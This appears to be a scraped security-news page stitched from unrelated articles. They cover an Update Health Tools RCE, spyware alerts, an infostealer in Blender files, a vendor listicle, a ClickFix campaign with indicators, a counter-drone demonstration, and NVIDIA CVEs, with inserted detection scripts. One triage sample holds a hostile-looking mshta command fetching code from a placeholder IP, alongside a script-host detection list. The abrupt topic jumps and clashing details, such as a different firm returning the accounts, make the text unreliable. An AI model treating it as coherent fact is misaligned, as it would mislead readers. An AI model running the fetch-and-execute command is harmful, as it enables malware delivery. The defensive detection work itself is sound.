A critical remote code execution (RCE) vulnerability affects Microsoft’s Update Health Tools (KB4023057), a widely deployed Windows component designed to expedite security updates through Intune.
The flaw stems from the tool connecting to abandoned Azure Blob storage accounts that attackers could register and control.
How the Vulnerability Works
The vulnerability exists in version 1.0 of the Update Health Tools, which uses Azure Blob storage accounts following a predictable naming pattern (payloadprod0 through payloadprod15.blob.core.windows.net) to fetch configuration files and commands.
Eye Security researchers found that Microsoft had left 10 of the 15 storage accounts unregistered and unused.
After registering these abandoned endpoints, the researchers observed over 544,000 HTTP requests within seven days from nearly 10,000 unique Azure tenants worldwide.
The tool’s uhssvc.exe service, located at C:\Program Files\Microsoft Update Health Tools, was actively resolving these domains across multiple enterprise environments.
The critical issue lies in the tool’s “ExecuteTool” action, which allows execution of Microsoft-signed binaries.
By crafting malicious JSON payloads that point to legitimate Windows executables such as explorer.exe, attackers can achieve arbitrary code execution on vulnerable systems.
The newer version 1.1 implements a proper web service at devicelistenerprod.microsoft.com, though backward-compatibility options could still expose systems.
Eye Security reported the vulnerability to Microsoft on July 7, 2025, and Microsoft confirmed the behavior on July 17.
Hashicorp researchers transferred ownership of all compromised storage accounts back to Microsoft on July 18, 2025, effectively closing the attack vector.
Organizations should ensure they are running the latest version of Update Health Tools and verify no legacy configurations remain enabled.
Security teams should monitor for unusual network traffic to Azure Blob storage endpoints from update services.
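One way to run the monitoring described above over DNS or proxy logs, as an added example that is not code from Eye Security or Microsoft: it labels each client by whether it queried the legacy payloadprod blob names, the version 1.1 endpoint, or both. The log layout, client names and sample lines are constructed assumptions; only the hostnames come from the article.

```python
import re
from collections import defaultdict

# Hostnames taken from the article: the v1.0 blob accounts and the v1.1 service.
LEGACY_RE = re.compile(r"payloadprod(0|[1-9][0-9]?)\.blob\.core\.windows\.net")
CURRENT_HOST = "devicelistenerprod.microsoft.com"
MAX_LEGACY_INDEX = 15  # the article gives the range payloadprod0 .. payloadprod15

# Constructed sample log. Assumed format: "<timestamp> <client> <queried name>".
SAMPLE_LOG = """\
2025-07-10T08:00:01Z WS-0142 payloadprod3.blob.core.windows.net
2025-07-10T08:00:02Z WS-0142 PayloadProd11.blob.core.windows.net.
2025-07-10T08:00:05Z SRV-DB01 devicelistenerprod.microsoft.com
2025-07-10T08:01:10Z WS-0207 payloadprod16.blob.core.windows.net
2025-07-10T08:01:11Z WS-0207 payloadprod3.blob.core.windows.net.example.org
2025-07-10T08:02:00Z WS-0311 payloadprod0.blob.core.windows.net
2025-07-10T08:02:30Z WS-0311 devicelistenerprod.microsoft.com
malformed line
""".splitlines()


def normalize(qname):
    """Lower-case a queried name and drop the trailing root dot."""
    return qname.strip().rstrip(".").lower()


def legacy_index(qname):
    """Return N if qname is exactly payloadprodN.blob.core.windows.net, else None.

    fullmatch() rejects look-alikes that merely contain the legacy name,
    and the range check rejects indexes outside the documented pattern.
    """
    match = LEGACY_RE.fullmatch(normalize(qname))
    if match is None:
        return None
    index = int(match.group(1))
    return index if index <= MAX_LEGACY_INDEX else None


def classify_clients(log_lines):
    """Map client -> (status, sorted legacy indexes seen).

    status is "legacy-only", "both" or "current-only". Clients that never
    queried an Update Health Tools endpoint are left out of the report.
    """
    seen = defaultdict(lambda: {"legacy": set(), "current": False})
    for line in log_lines:
        fields = line.split()
        if len(fields) != 3:
            continue  # skip lines that do not fit the assumed format
        _timestamp, client, qname = fields
        index = legacy_index(qname)
        if index is not None:
            seen[client]["legacy"].add(index)
        elif normalize(qname) == CURRENT_HOST:
            seen[client]["current"] = True

    report = {}
    for client, state in seen.items():
        if state["legacy"] and state["current"]:
            status = "both"  # v1.1 present, legacy path still in use
        elif state["legacy"]:
            status = "legacy-only"
        else:
            status = "current-only"
        report[client] = (status, sorted(state["legacy"]))
    return report


if __name__ == "__main__":
    for client, (status, indexes) in sorted(classify_clients(SAMPLE_LOG).items()):
        print(f"{client:10} {status:13} legacy indexes: {indexes}")
```

Clients reported as "legacy-only" or "both" are the ones to check for an outdated Update Health Tools install or a remaining backward-compatibility setting.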
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert warning that multiple cyber threat actors are actively exploiting commercial spyware to target users of popular mobile messaging applications, including Signal and WhatsApp. The advisory, published on November 24, 2025, highlights sophisticated attack techniques aimed at compromising victim accounts and gaining unauthorized access […]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications.
“These cyber actors use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app,
Threat actors are weaponizing Blender Foundation project files to deliver the notorious StealC V2 infostealer, targeting 3D artists and game developers who download community assets from popular marketplaces. In recent months, Morphisec has blocked multiple sophisticated campaigns abusing Blender’s embedded scripting capabilities to silently deploy StealC V2, highlighting a growing nexus between creative tools and […]
Exposure Management is a proactive cybersecurity discipline that systematically identifies, assesses, prioritizes, and remediates security vulnerabilities and misconfigurations across an organization’s entire attack surface, both internal and external.
Unlike traditional, periodic vulnerability scanning, EM leverages continuous monitoring, threat intelligence, and a holistic, graph-based view of risk to anticipate and neutralize potential attack paths before adversaries can exploit them.
It is the practical application of the Continuous Threat Exposure Management (CTEM) framework, which defines a cyclical five-step process: Scoping, Discovery, Prioritization, Validation, and Mobilization.
The core value of an EM platform lies in its ability to consolidate findings from diverse security tools (such as vulnerability scanners, cloud posture management, and EDR) and enrich them with business context (e.g., asset criticality, owner) and attacker context (e.g., exploitability in the wild).
This consolidation drastically reduces alert fatigue by focusing security teams on the few exposures that pose the greatest, most exploitable risk to the business, rather than a massive, unprioritized list of Common Vulnerabilities and Exposures (CVEs).
Ultimately, EM drives measurable reduction in the organizational risk posture and improves the efficiency of security operations.
How We Choose Exposure Management Tools
Selecting the right Exposure Management Tool requires a strategic approach focused on holistic coverage, actionable intelligence, and seamless integration with existing Security Operations Center (SOC) workflows.
Our methodology for evaluating the top tools is based on several key criteria:
Scope and Discovery Coverage: The tool must offer comprehensive, continuous discovery of all assets, including known, unknown (Shadow IT), and third-party/vendor-related assets, across the full spectrum of modern infrastructure (on-premise, multi-cloud, SaaS, and code). Look for agentless and API-based scanning capabilities for minimal friction.
Risk Prioritization & Context: The platform’s ability to prioritize vulnerabilities must go beyond simple severity scores (CVSS). The best tools use a risk-based approach incorporating:
Attacker Context: Real-time threat intelligence on active exploitation.
Business Context: Asset criticality, data sensitivity, and owner.
Attack Path Visualization: Mapping how an exposure can be chained with others to create an end-to-end attack path.
Validation and Remediation Integration: A top-tier tool validates whether an exposure is actually exploitable (often via integrated Breach and Attack Simulation – BAS) and provides clear, actionable remediation guidance, including one-click fixes or direct integration with ticketing/workflow systems (like Jira, ServiceNow) to accelerate Mean Time to Remediate (MTTR).
Scalability and Architecture: The solution must be highly scalable to accommodate a dynamic, rapidly expanding digital footprint, especially in cloud-native environments.
A cloud-native, agentless architecture often simplifies deployment and reduces operational overhead.
Comparison Table: Top 10 Best Exposure Management Tools In 2026
Mandiant is chosen for its world-class, frontline threat intelligence, which directly informs its risk prioritization engine.
This allows organizations to prioritize exposures that Mandiant’s consultants know adversaries are actively exploiting in real-world attacks.
Specifications & Features
Intel-Informed Checks: Uses Mandiant’s own threat intelligence for active and passive checks of external assets.
Continual Asset Discovery: Automated, continuous discovery and inventory of internet-facing assets, including Shadow IT.
Multicloud Assessment: Ability to assess cloud-hosted external assets and unify visibility across hybrid/multicloud.
Centralized Risk Mitigation: Consolidates visibility and provides clear paths for remediation, driven by threat context.
Reason to Buy
You need an exposure management tool that is directly fed by the industry’s most current, credible, and real-world attacker intelligence to ensure your security team focuses exclusively on the most exploitable risks.
Pros & Cons
Pros: Direct integration with Mandiant’s proprietary threat intel; Strong external focus and shadow IT detection; Effective for large, complex enterprises.
Cons: Less focus on integrated validation (BAS) than some competitors; Pricing can be complex; May require Mandiant-specific expertise for full value.
Best For: Enterprises prioritizing real-world threat intelligence and wanting an outside-in, attacker’s view of their external attack surface.
Wiz is the undisputed leader in Cloud Security Posture Management (CSPM) and has expanded to offer deep exposure management features rooted in its unique, agentless Security Graph.
It’s ideal for organizations that are cloud-first or heavily invested in multi-cloud environments.
Specifications & Features
Agentless-First Scanning: Provides 100% coverage of the cloud environment without agents, using API and snapshot reading.
Graph-Based Risk Prioritization: Correlates security findings across workloads, network, identity, and data to identify critical attack paths.
Unified Vulnerability Management: Centralizes and prioritizes vulnerabilities across cloud, code, and on-premises using the same context model.
Shift-Left Capabilities: Integrates with code (SAST/DAST) tools to find and fix vulnerabilities early in the development lifecycle.
Reason to Buy
Your primary risk is in the cloud, and you need a consolidated, context-aware platform that can identify exploitable security gaps that span across multiple cloud resources, identities, and data stores.
Pros & Cons
Pros: Deepest cloud security context and coverage; Exceptional ease of deployment (agentless); Industry-leading Security Graph technology; Excellent for modern DevOps pipelines.
Cons: Originally cloud-centric, with less native EASM/on-prem heritage; Can be expensive for smaller operations; Remediation often relies on integrations.
Best For: Cloud-Native and Multi-Cloud organizations that need to prioritize risk based on exploitability within the cloud environment.
RiskProfiler is selected for its focus on providing a unified view of risk that extends beyond the organization’s perimeter to include third-party vendor risk and brand risk (phishing, impersonation), making it a comprehensive CTEM solution.
Specifications & Features
Unified CTEM Ecosystem: Consolidates External, Cloud, Vendor, and Brand risk into a single platform.
Brand Risk Protection: Monitors for brand impersonation, typosquats, phishing, and fake apps.
AI-Enabled Third-Party Risk Management: Automates the exchange and scoring of vendor security questionnaires.
Context-Based Graph Models: Pinpoints and ranks exposed assets by evaluating risks through a hacker’s lens.
Reason to Buy
You need to manage your total external risk, including the exposure introduced by supply chain vendors and threats to your brand reputation outside of your technical infrastructure.
Pros & Cons
Pros: Strong integration of third-party risk management; Dedicated brand protection features; Contextual threat insights for prioritization; Unified view across four major risk domains.
Cons: Focus is heavily external, may require other tools for deep internal security; Smaller market presence compared to industry giants; Initial setup for all modules can be complex.
Best For: Organizations with significant third-party vendor reliance and high exposure to brand-related threats (phishing, impersonation).
CrowdStrike is included for its ability to integrate Exposure Management natively within the Falcon platform, leveraging its ubiquitous single, lightweight sensor for real-time asset discovery and vulnerability assessment across the internal and external attack surface.
Specifications & Features
Unified Falcon Sensor: Uses a single, lightweight agent for real-time, maintenance-free vulnerability assessment and continuous visibility.
AI-Powered Asset Criticality: Automatically classifies assets (Critical, High, Non-Critical) based on business context and peer insights.
Full Lifecycle Vulnerability Management: Covers asset discovery, assessment, prioritization, and effective remediation within a single product.
Active, Passive, & API Discovery: Discovers all assets, including sensorless devices (routers, IoT), without traditional network scanning appliances.
Reason to Buy
You are already a CrowdStrike customer and want to consolidate your endpoint security, threat intelligence, and exposure management into a single, high-performance platform with minimal footprint.
Pros & Cons
Pros: Real-time visibility without scan windows; Excellent threat intelligence integration; Reduces the need for multiple security agents; Seamlessly integrates with EDR/XDR workflows.
Cons: Heavily reliant on the Falcon sensor (not fully agentless); Primarily focuses on the asset visibility the sensor can provide; Higher cost for the full unified platform.
Best For: Organizations committed to the CrowdStrike Falcon platform who prioritize real-time, continuous visibility over periodic scanning.
Tenable is a long-standing leader in Vulnerability Management (VM) that has successfully pivoted to the holistic Exposure Management model with its Tenable One platform, offering deep, comprehensive coverage across IT, cloud, and operational technology (OT).
Specifications & Features
Converged Exposure Platform: Unifies data from Tenable’s VM, EASM, Cloud Security, and AD Security products.
Predictive Prioritization Scoring (PPS): Uses machine learning to anticipate which vulnerabilities are most likely to be exploited in the near future.
Unified Attack Surface Visualization: Provides a consolidated view of the entire attack surface and the paths an attacker could take.
Broadest Asset Coverage: Includes IT, Web Apps, OT, Cloud, and Active Directory security posture.
Reason to Buy
You require a solution from a trusted VM vendor that offers the broadest coverage of assets and the ability to leverage predictive analytics to prioritize remediation based on future exploit likelihood.
Pros & Cons
Pros: Deepest history and coverage in core vulnerability management; Strong support for diverse environments (OT/AD); Predictive risk scoring for proactive prioritization; High potential for upselling existing Tenable customers.
Cons: Can be perceived as scan-heavy (though API-based for cloud); Platform integration is newer than individual products; Transitioning from a VM mindset to an EM mindset can be a learning curve.
Best For: Large enterprises seeking to consolidate and modernize their legacy vulnerability and asset management programs under a single, unified exposure platform.
Qualys is a veteran in the security space that has tightly integrated its External Attack Surface Management (EASM) into its comprehensive Cloud Platform, providing a seamless “outside-in” and “inside-out” view for existing customers.
Specifications & Features
EASM as a Feature: Provides an outside-in view of internet-facing assets within the Qualys Cloud Platform (CSAM).
Continuous Monitoring: Continuously monitors the external attack surface to discover new domains, unsolicited ports, certificates, and applications.
Asset Discovery: Discovers all domains, subdomains, and associated assets, including unknown/unmanaged assets.
Integration with VMDR: Directly feeds EASM findings into the Vulnerability Management, Detection, and Response (VMDR) workflow for prioritization and remediation.
Reason to Buy
You are a current Qualys customer looking to extend the reach of your existing security platform to continuously discover and manage your external digital footprint and integrate findings with a familiar VMDR workflow.
Pros & Cons
Pros: Deep integration with the Qualys ecosystem; Comprehensive visibility of external assets; Robust for large organizations with complex IT infrastructure; Consolidates EASM under a single vendor.
Cons: EASM features can feel like an add-on to the VMDR core; Full feature set requires adoption of the full Qualys Cloud Platform; Initial EASM feature may have started as a beta.
Best For: Existing Qualys Cloud Platform users who want to centralize EASM and vulnerability data under a single vendor.
CyCognito stands out for its attacker-centric approach, which automatically discovers and tests all internet-exposed assets (both known and unknown) from the perspective of a malicious actor, prioritizing risks based on the probability and impact of exploitation.
Specifications & Features
Attacker-Centric Discovery: Discovers all internet-exposed assets to build a complete picture of the attack surface from the outside.
Automated Security Testing: Automatically detects and validates potential attack vectors across the external IT ecosystem.
Business Context Mapping: Graphs asset relationships and determines business context (owner, purpose, data sensitivity) for better prioritization.
Comprehensive Prioritization: Ranks attack vectors based on attacker priorities, business context, ease of exploitation, and remediation complexity.
Reason to Buy
You need an EM solution that goes beyond inventorying assets to actively and continuously testing them for exploitable flaws, helping you see and fix your exposure exactly as an attacker would.
Pros & Cons
Pros: Powerful, continuous security testing at scale; Strong focus on unknown/unmonitored assets; Prioritization based on attacker logic; Provides clear remediation guidance.
Cons: Not a traditional internal vulnerability scanner; Focus is heavily on the external/perimeter attack surface; Higher price point reflective of its advanced testing capabilities.
Best For: Organizations that prioritize continuous, active security testing and require an outside-in, attacker-focused view of their risk.
Microsoft is a strategic choice for its deep integration into the Microsoft Defender suite and its ability to provide a comprehensive view of external risks by leveraging Microsoft’s vast threat intelligence and cloud infrastructure presence.
Specifications & Features
Attack Surface Discovery: Maps the organization’s external attack surface by identifying all internet-facing assets, services, and applications.
Threat Intelligence Integration: Leverages up-to-date Microsoft threat intelligence feeds for proactive threat identification and response.
Automated Vulnerability Assessment: Automates the assessment of external defenses to find and address weaknesses.
Integration with Defender Ecosystem: Seamlessly works with other Microsoft Defender components (e.g., EDR, Cloud Security Posture Management) for unified security.
Reason to Buy
You are heavily invested in the Microsoft ecosystem (Azure, M365) and need a native, integrated EM solution that leverages your existing tools and Microsoft’s global threat intelligence network.
Pros & Cons
Pros: Unbeatable integration for Microsoft shops; Leverages Microsoft’s massive threat intelligence; Cost-friendly for existing Defender customers; Strong security monitoring and protection.
Cons: Initial setup and integration can be complicated for varied IT environments; Limited for non-Microsoft-centric cloud/infrastructure; Features may be more limited than best-of-breed EASM pure-plays.
Best For: Organizations that have standardized on the Microsoft Defender suite and utilize Microsoft Azure/Cloud services.
Cymulate is unique on this list because its core strength is Breach and Attack Simulation (BAS) and Exposure Validation, enabling organizations to continuously test their defenses against the latest adversarial techniques and validate that an exposure is truly a risk.
Specifications & Features
BAS/Exposure Validation Core: Continuously tests security controls across the full kill chain using automated, live, offensive testing.
AI-Assisted Custom Testing: Allows users to create realistic, multi-stage attack chains from plain language prompts or threat advisories (Purple Teaming).
Optimized Remediation: Provides actionable guidance, including control-ready threat updates and custom detection rules for SIEM/EDR platforms.
Cyber Resilience Metrics: Delivers a unified, measurable view of security posture, benchmarked against industry peers.
Reason to Buy
You need to move beyond simple vulnerability discovery to empirically validate if your security controls (firewalls, EDR, SIEM rules) are actually working against current threats and prioritize only those exposures that validation proves are exploitable.
Pros & Cons
Pros: Core focus on validation (BAS/CTEM step 4); Automated Purple Teaming capabilities; Provides quantitative, board-ready cyber resilience metrics; Excellent for optimizing and tuning existing security tools.
Cons: External Attack Surface Discovery is a supporting feature rather than the core focus; Requires strong integration with other discovery/scanner tools for full EM value; Requires expertise to leverage the full BAS potential.
Best For: Security teams that need to validate, optimize, and prove the effectiveness of their existing security controls against real-world threats (CTEM Validation).
Bitsight is known for its market-leading Security Ratings and brings that proprietary risk scoring and analytics model to its EASM platform, offering unmatched signal quality and contextual intelligence for external risks and third-party risk management.
Specifications & Features
Unmatched Signal Quality: Leverages behavioral analytics and telemetry from billions of daily events to identify true exposures with high precision.
Integrated Third-Party Risk: Extends EASM visibility and risk scoring to third-party vendors and supply chain partners.
Daily Discovery Cadence: Automated, daily discovery and classification of new or changed internet-facing assets.
Integration with GRC/SOC Workflows: Provides data for rapid response and allows for integration with workflow tools like Jira and ServiceNow.
Reason to Buy
Your primary driver is a quantifiable, data-driven security rating for both your own organization and your entire supply chain, driven by high-quality external risk data and analytics.
Pros & Cons
Pros: Industry-leading security ratings and risk quantification; Excellent for third-party risk management; Daily and automated asset discovery; Strong reporting and governance (GRC) focus.
Cons: Licensing model can be complex; Historically focused on ratings, the EASM platform is a newer extension; Less of an internal, post-exploitation focus than some other platforms.
Best For: Risk and Governance (GRC) teams that need quantitative security ratings and highly accurate, data-driven external exposure management for themselves and their vendors.
The evolution from reactive Vulnerability Management to proactive Exposure Management is the defining shift in cybersecurity for 2026.
The Top 10 Best Exposure Management Tools in 2026 reflect this trend, with leading vendors moving toward unified platforms that integrate discovery, threat intelligence, business context, and attack validation to deliver a prioritized, actionable view of risk.
When selecting a tool, organizations must align their choice with their primary risk domain, whether it’s cloud-native risk (Wiz), the need for real-world threat intelligence (Mandiant), or the necessity of proving control effectiveness (Cymulate).
All platforms excel in risk prioritization, but the method (threat intelligence vs. attack path analysis vs. security ratings) is what sets them apart.
To begin building a comprehensive EM program, security teams should focus on the initial step of Continuous Threat Exposure Management (CTEM) by establishing a complete inventory of all internet-facing assets.
A new wave of ClickFix attacks is abusing highly realistic fake Windows Update screens and PNG image steganography to secretly deploy infostealing malware such as LummaC2 and Rhadamanthys on victim systems.
The campaigns rely on tricking users into manually running a pre-staged command, turning simple social engineering into a multi-stage, file-light infection chain that is hard for traditional defenses to spot.
ClickFix is a social engineering technique in which a web page convinces users to press Win+R, then paste and run a command that has been silently copied to the clipboard.
Earlier lures posed as “Human Verification” or robot-check pages, but newer activity observed by Huntress swaps this for a full-screen, blue Windows Update-style splash screen with convincing progress messages.
Once the fake update “completes,” the page instructs users to follow the familiar pattern and execute the malicious Run-box command.
That command typically launches mshta.exe with a URL whose second IP octet is hex-encoded, kicking off a staged chain that downloads obfuscated PowerShell and reflective .NET loaders. This approach leans heavily on trusted “living off the land” binaries, making the activity blend in with legitimate Windows behavior.
Malware hidden in PNG pixels
The most distinctive feature of this campaign is its use of a .NET steganographic loader that hides shellcode inside the pixel data of a PNG image.
Instead of appending data, the loader AES-decrypts an embedded PNG resource, reads the raw bitmap bytes, and reconstructs shellcode from a specific color channel, using a custom XOR-based routine to recover the payload in memory.
The recovered shellcode is Donut-packed and then injected into a target process such as explorer.exe via dynamically compiled C# code that calls standard Windows APIs like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.
In analyzed cases, this final stage has delivered LummaC2 and, in a separate Windows Update cluster, the Rhadamanthys information stealer.
Huntress has tracked ClickFix Windows Update clusters since early October, noting repeated use of the IP address 141.98.80[.]175 and rotating paths such as /tick.odd, /gpsc.dat, and /one.dat for the first mshta.exe stage.
Subsequent PowerShell stages have been hosted on domains like securitysettings[.]live and xoiiasdpsdoasdpojas[.]com, pointing back to the same backend infrastructure.
These campaigns continued to appear around the time of Operation Endgame 3.0, which targeted Rhadamanthys’ infrastructure in mid-November, disrupting servers and seizing domains linked to the stealer.
Even after the takedown announcement, researchers observed multiple active domains still serving the Windows Update ClickFix lure, though the Rhadamanthys payload itself appeared to be unavailable.
Because the attack hinges on user interaction with the Run dialog, one strong control is to disable the Windows Run box via Group Policy or registry settings (for example, configuring the NoRun policy under the Explorer key).
Security teams should also use EDR telemetry to watch for explorer.exe spawning mshta.exe, powershell.exe, or other scripting binaries with suspicious command lines.
User awareness remains critical: employees should be trained that neither CAPTCHA checks nor Windows Update processes will ever require pasting commands into the Run prompt from a web page.
During investigations, analysts can further validate potential ClickFix abuse by reviewing the RunMRU registry key, which records recent commands executed via the Run dialog.
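The EDR and RunMRU checks described above can share one triage routine. The following is an added example, not Huntress tooling: it flags a script host launched with a URL, normalizes an IP literal that carries a hex-encoded octet, and applies the same test to process events whose parent is explorer.exe and to exported RunMRU values. The event field names, the sample data (documentation-range addresses) and the extra script hosts beyond mshta.exe and powershell.exe are assumptions.

```python
import ntpath
import re

# mshta.exe and powershell.exe come from the article; the rest are assumed siblings.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

FIRST_TOKEN_RE = re.compile(r'\s*(?:"([^"]+)"|(\S+))')
HOST_RE = re.compile(r"https?://([^/\s:\"'<>]+)", re.IGNORECASE)
HEX_OCTET_RE = re.compile(r"0x[0-9a-f]{1,2}", re.IGNORECASE)


def decode_mixed_ip(host):
    """Return (dotted_decimal, had_hex_octet) for a 4-part IPv4 literal whose
    octets are decimal or 0x-hex; return None for anything else."""
    parts = host.split(".")
    if len(parts) != 4:
        return None
    octets, had_hex = [], False
    for part in parts:
        if HEX_OCTET_RE.fullmatch(part):
            value, had_hex = int(part, 16), True
        elif part.isascii() and part.isdigit() and len(part) <= 3:
            value = int(part)
        else:
            return None
        if value > 255:
            return None
        octets.append(str(value))
    return ".".join(octets), had_hex


def triage_command(command_line):
    """List the reasons a command line matches the ClickFix first stage."""
    cmd = command_line.strip()
    if cmd.endswith("\\1"):  # RunMRU values carry a trailing "\1" marker
        cmd = cmd[:-2].rstrip()
    match = FIRST_TOKEN_RE.match(cmd)
    if match is None:
        return []
    image = ntpath.basename(match.group(1) or match.group(2)).lower()
    if not image.endswith(".exe"):
        image += ".exe"  # the Run box accepts "mshta" without the extension
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    for host in HOST_RE.findall(cmd):
        decoded = decode_mixed_ip(host)
        if decoded is None:
            reasons.append(f"{image} given remote URL host {host}")
        elif decoded[1]:
            reasons.append(
                f"{image} given URL with hex-encoded IP octet: {host} -> {decoded[0]}")
        else:
            reasons.append(f"{image} given URL with raw IP host {decoded[0]}")
    return reasons


def triage_process_event(event):
    """Apply triage_command only to processes whose parent is explorer.exe."""
    if ntpath.basename(event["parent_image"]).lower() != "explorer.exe":
        return []
    return triage_command(event["command_line"])


def triage_runmru(values):
    """Map RunMRU value name -> reasons, skipping the MRUList ordering value."""
    hits = {}
    for name, data in values.items():
        if name.lower() == "mrulist":
            continue
        reasons = triage_command(data)
        if reasons:
            hits[name] = reasons
    return hits


# Constructed samples using documentation-range addresses, not real indicators.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta http://198.0x33.100.7/a.dat\\1",
    "c": "\\\\fileserver\\share\\1",
}
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" http://198.0x33.100.7/a.dat'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "mshta.exe http://198.51.100.7/a.dat"},
]

if __name__ == "__main__":
    print(triage_runmru(SAMPLE_RUNMRU))
    for event in SAMPLE_EVENTS:
        print(triage_process_event(event))
```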
TRUPPENÜBUNGSPLATZ PUTLOS TRAINING GROUND, Germany—In a grassy field near the Baltic Sea, U.S. soldiers used net-shooting hunter drones, specially outfitted 557 rifles, and .50-caliber machine guns to drop dozens of drones, large and small, into the cold mud.
For the U.S. Army, the daylong event marked the beginning of the end of firing $4-million missiles at $20,000 drones; for its European counterparts, it showed off options to counter Russia’s accelerating threat.
The event was part of Project Flytrap, a U.S. Army effort to advance the state of counter-drone art. More than 200 vendors applied to participate in the November iteration; 20 were chosen by the Global Tactical Edge Acquisition Directorate, a new procurement office the service set up to get such gear to the field quickly.
On Nov. 21, media and foreign militaries watched a series of demonstrations that showed off not just individual products, but how they could be made to work together in just days.
Brig. Gen. Curtis King of the 10th Army Air and Missile Defense Command told Defense One that Ukrainian descriptions of battlefield conditions have helped the U.S. Army develop new tactics, gear, and weapons.
Because supply lines are vulnerable, it’s useful to be able to make drones at, or near, the front lines. In a tent on the field, a soldier with the 10th AAMDC showed off the results of some experimentation: a 3D printer that can print a drone frame in a few hours. With pre-ordered electronic components, it could serve as an interceptor or as part of a sensor mesh to locate enemy drones and their launching points.
More sensing is key to effective, affordable counter-drone efforts. King said one of the most important aspects of the event was integrating data from active radar systems with that of passive radar, a novel form that deduces a drone’s location from perturbations in FM radio signals. And he said the event showed off a real breakthrough: integrating all that sensor data so it could be used at all levels, from anti-drone snipers to the operators of first-person-view drones to unit commanders.
“We were able to send that to the units that were working on classified systems, and we were able to send that information to units who were working on sensitive but unclassified information. We've been demonstrating that for a while, but what was so significant this time is the number of sensors that we did and we did that with no latency, meaning we got real-time data,” he said.
Soldier feedback led to a top prize for Armaments Research Company, whose portable drone-tracing gear could turn “every soldier into a sensor,” said CEO Mike Canty, an Iraq War veteran.
An “aim assistant” from Zeromark helps soldiers shoot down drones with bullets—rather than with lasers that are still under development or jammers that don’t work against autonomous drones.
Then there’s Fortem's net-shooting drone, useful in cities or around civilian populations.
Besides helping the U.S. Army, the show aimed to help European officials learn to defend themselves against Russian drones, even if the U.S. backs out of its security guarantees.
“What you saw today … are effectors that cost much less, sometimes a tenth of the cost of that drone. So not only are we still achieving the lethality we need, but we're doing it on the right side of the cost curve,” King told reporters.
Journalists from Europe wanted to know: will the tech on display really stop Russian drone incursions?
King and other Army officials didn’t have a simple answer. They noted that the United States remains part of NATO, that the event aimed to inform European decision-making, and that future FlyTrap events will incorporate ground robotics and air-launched effects.
Col. Chris Hill, project manager for integrated fires mission command, noted, “The real goal is to have soldiers from other countries that are part of the assessment, because you want skin in the game early. You want your soldiers to take a look at their own commands, to say, ‘Yes, this capability works.’ You see a lot of non-U.S. flags out there because if you look at the eastern flank, those are NATO countries. So every country along that plane who's in closest proximity to the threat from Russia needs to know that the kit actually works.”
NVIDIA has disclosed two critical code injection vulnerabilities affecting its Isaac-GR00T robotics platform.
The vulnerabilities, tracked as CVE-2025-33183 and CVE-2025-33184, exist within Python components and could allow authenticated attackers to execute arbitrary code, escalate privileges, and alter system data.
The flaws pose a significant threat to organizations deploying NVIDIA’s robotics solutions across industrial automation, research facilities, and autonomous systems.
Both vulnerabilities carry a high CVSS score of 7.8, indicating serious security risks that require immediate remediation.
Vulnerability Details
The code injection issues affect all versions of NVIDIA Isaac-GR00T N1.5 across all platforms.
An attacker with local access and low-level privileges could exploit these vulnerabilities without user interaction, potentially gaining complete system control.
CVE ID | Description | CVSS Score | CWE | Attack Vector
CVE-2025-33183 | Code injection in Python component allowing arbitrary code execution | 7.8 | CWE-94 | Local/Low Privilege
CVE-2025-33184 | Code injection in Python component allowing arbitrary code execution | 7.8 | CWE-94 | Local/Low Privilege
Successful exploitation could result in unauthorized code execution, privilege escalation, information disclosure, and data modification, compromising the integrity of critical robotic operations.
Both vulnerabilities stem from improper handling of user-supplied input in Python components, classified under CWE-94 (Improper Control of Generation of Code).
This weakness has been historically exploited in numerous attacks targeting interpreted code environments.
NVIDIA has released a software update addressing both vulnerabilities. The patch is available through GitHub commit 7f53666 of the Isaac-GR00T repository.
Organizations running Isaac-GR00T should immediately update to any code branch incorporating this specific commit to eliminate the attack surface.
System administrators should prioritize deploying the security update across all Isaac-GR00T deployments.
Given the high severity rating and the potential for critical system compromise, NVIDIA recommends treating this as an urgent priority.
Organizations unable to patch immediately should restrict local access to affected systems and monitor for suspicious activity.
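An added example, not NVIDIA's or the article's own code: one way to verify that a local Isaac-GR00T git checkout incorporates commit 7f53666. The function names and the checkout paths passed in are assumptions; the check separates a checkout that lacks the fix from one whose local history is too stale or shallow to decide.

```bash
#!/usr/bin/env bash
# Added example: classify local git checkouts against a fix commit.
# The commit id comes from the advisory text; checkout paths are assumptions.
FIX_COMMIT="${FIX_COMMIT:-7f53666}"

# check_fix <checkout_dir> [commit]
# Prints PATCHED, UNPATCHED, UNKNOWN or NOT_A_REPO; returns 0, 1, 2 or 3.
check_fix() {
    local dir="$1" commit="${2:-$FIX_COMMIT}"

    # Not a git work tree (missing path, or installed from an archive):
    # ancestry cannot be checked this way.
    if ! git -C "$dir" rev-parse --is-inside-work-tree >/dev/null 2>&1; then
        echo "NOT_A_REPO"; return 3
    fi

    # The commit object is absent locally (stale or shallow clone).
    # This is not proof of being unpatched; fetch history and re-run.
    if ! git -C "$dir" cat-file -e "${commit}^{commit}" 2>/dev/null; then
        echo "UNKNOWN"; return 2
    fi

    # The fix only counts if it is reachable from what is checked out,
    # not merely present on some other branch in the object store.
    if git -C "$dir" merge-base --is-ancestor "$commit" HEAD 2>/dev/null; then
        echo "PATCHED"; return 0
    fi
    echo "UNPATCHED"; return 1
}

# audit_checkouts <commit> <dir>...
# Prints one "STATUS<TAB>path" line per checkout and returns non-zero
# if any checkout is anything other than PATCHED.
audit_checkouts() {
    local commit="$1" rc=0 dir status
    shift
    for dir in "$@"; do
        status="$(check_fix "$dir" "$commit")" || rc=1
        printf '%s\t%s\n' "$status" "$dir"
    done
    return "$rc"
}
```

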